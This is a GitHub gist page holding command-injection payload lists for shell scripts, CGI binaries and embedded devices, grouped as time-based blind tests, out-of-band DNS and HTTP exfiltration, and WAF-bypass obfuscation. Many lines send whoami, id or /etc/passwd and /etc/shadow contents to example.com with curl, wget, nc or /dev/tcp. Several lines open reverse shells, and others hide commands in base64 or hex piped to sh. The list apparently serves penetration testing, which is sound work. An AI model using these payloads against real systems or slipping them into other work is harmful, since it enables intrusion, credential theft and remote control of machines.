Created
May 30, 2026 13:01
-
-
Save win3zz/31b53a9999f444fb76a4380d8622ec64 to your computer and use it in GitHub Desktop.
command-injection, RCE, OOB exfiltration, WAF-bypass - payload lists
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Useful for Shell scripts, BusyBox applets, ELF binaries, CGI binaries, Init scripts, IPC handlers, Configuration parsers etc | |
| --- | |
| # --- TIME-BASED BLIND DETECTION --- | |
| ;sleep 10; | |
| |sleep 10| | |
| &sleep 10& | |
| \nsleep 10\n | |
| `sleep 10` | |
| $(sleep 10) | |
| ;sleep${IFS}10; | |
| ;busybox${IFS}sleep${IFS}10; | |
| ;X=sleep;Y=10;$X$IFS$Y; | |
| ;echo${IFS}c2xlZXAgMTA=|base64${IFS}-d|sh; | |
| ;printf${IFS}'\x73\x6c\x65\x65\x70\x20\x31\x30'|sh; | |
| ;timeout 10 sh -c 'sleep 10'; | |
| ;perl -e 'sleep 10'; | |
| ;python -c "import time;time.sleep(10)"; | |
| ;php -r "sleep(10);"; | |
| ;awk 'BEGIN{system("sleep 10")}'; | |
| ;sh -c "sleep 10"; | |
| ;bash -c "sleep 10"; | |
| ;$(sleep${IFS}10) | |
| ;`sleep${IFS}10` | |
| ;{sleep,10} | |
| ;exec sleep 10 | |
| ;true|sleep 10 | |
| ;false;sleep 10 | |
| # --- OUT-OF-BAND (OOB) DNS / HTTP DETECTION --- | |
| ;ping -c 4 $(whoami).example.com; | |
| |ping -c 4 `whoami`.example.com| | |
| &ping -c 4 $(uname -m).example.com& | |
| $(nslookup $(whoami).example.com) | |
| `nslookup \`uname -a\`.example.com` | |
| ;wget http://example.com/$(whoami); | |
| |wget http://example.com/`id`| | |
| ;curl http://example.com/$(whoami); | |
| |curl http://example.com/`id`| | |
| ;curl http://example.com/?d=$(id|base64); | |
| ;wget --post-data=$(id|base64) http://example.com/; | |
| ;curl -A $(whoami) http://example.com/ | |
| ;wget --header="X-Data: $(id)" http://example.com/ | |
| ;curl -d "data=$(uname -a)" http://example.com/ | |
| ;wget --header="User-Agent: $(whoami)" http://example.com/ | |
| ;ftp example.com <<< $(id) | |
| ;nc example.com 1234 <<< $(uname -a) | |
| ;echo $(id)|nc example.com 80 | |
| ;echo $(whoami)|telnet example.com 80 | |
| ;curl http://example.com/$(id|tr -d ' ') | |
| ;wget http://example.com/$(id|tr -d ' ') | |
| # --- WAF BYPASS / SPACE OBFUSCATION VARIANTS --- | |
| ;cat$IFS/etc/passwd; | |
| ;cat${IFS}/etc/passwd; | |
| ;cat$IFS$9/etc/passwd; | |
| ;{cat,/etc/passwd}; | |
| X=$'\x20';cat$X/etc/passwd; | |
| X=cat;Y=/etc/passwd;$X$IFS$Y; | |
| ;cat</etc/passwd; | |
| ;cat$IFS/etc/shadow; | |
| ;cat<<<"/etc/passwd"; | |
| ;cat$IFS</etc/passwd; | |
| ;cat</etc/shadow; | |
| ;{cat,/etc/shadow}; | |
| ;IFS=,;cat,/etc/passwd | |
| ;cat$IFS$1/etc/passwd | |
| ;cat$IFS$2/etc/passwd | |
| ;cat$IFS$PATH/etc/passwd | |
| # --- WAF BYPASS / CHARACTER OBFUSCATION VARIANTS --- | |
| ;c\a\t /e\t\c/p\a\s\s\w\d; | |
| ;c'a't /e't'c/p'a's's'w'd; | |
| ;c"a"t /e"t"c/p"a"s"s"w"d; | |
| ;cat /et*/*passwd; | |
| ;cat /et?/pas??w; | |
| ;echo$IFS'Y2F0IC9ldGMvcGFzc3dk'$IFS|$IFS'base64'$IFS'-d'|$IFS'sh'; | |
| ;printf$IFS'\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'|sh; | |
| ;c\at /etc/p\asswd | |
| ;c@t /etc/p@sswd | |
| ;c%at /etc/p%asswd | |
| ;c^at /etc/p^asswd | |
| ;c*at /etc/p*asswd | |
| ;ca\t /etc/pas\swd | |
| ;ca\t /etc/pas$IFS$swd | |
| ;echo$IFS'Y2F0IC9ldGMvc2hhZG93'|base64 -d|sh | |
| ;perl -e 'print "cat /etc/passwd\n"'|sh | |
| ;python -c "print('cat /etc/passwd')"|sh | |
| # --- OUT-OF-BAND VIA BUILT-IN NETWORK UTILITIES (BUSYBOX COMPATIBLE) --- | |
| ;host $(whoami).example.com; | |
| ;dig $(whoami).example.com; | |
| ;telnet example.com 80 </etc/passwd; | |
| ;cat /etc/passwd > /dev/tcp/example.com/80; | |
| ;nc example.com 80 < /etc/passwd; | |
| ;nc -e /bin/sh example.com 4444 | |
| ;exec 5<>/dev/tcp/example.com/80;cat /etc/passwd >&5 | |
| ;bash -i >& /dev/tcp/example.com/4444 0>&1 | |
| ;telnet example.com 1234 <<< $(whoami) | |
| ;ftp -n example.com <<< "quote USER $(id)" | |
| ;curl -T /etc/passwd http://example.com/ | |
| ;wget --method=PUT --body-file=/etc/passwd http://example.com/ | |
| ;scp /etc/passwd user@example.com:/tmp/ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment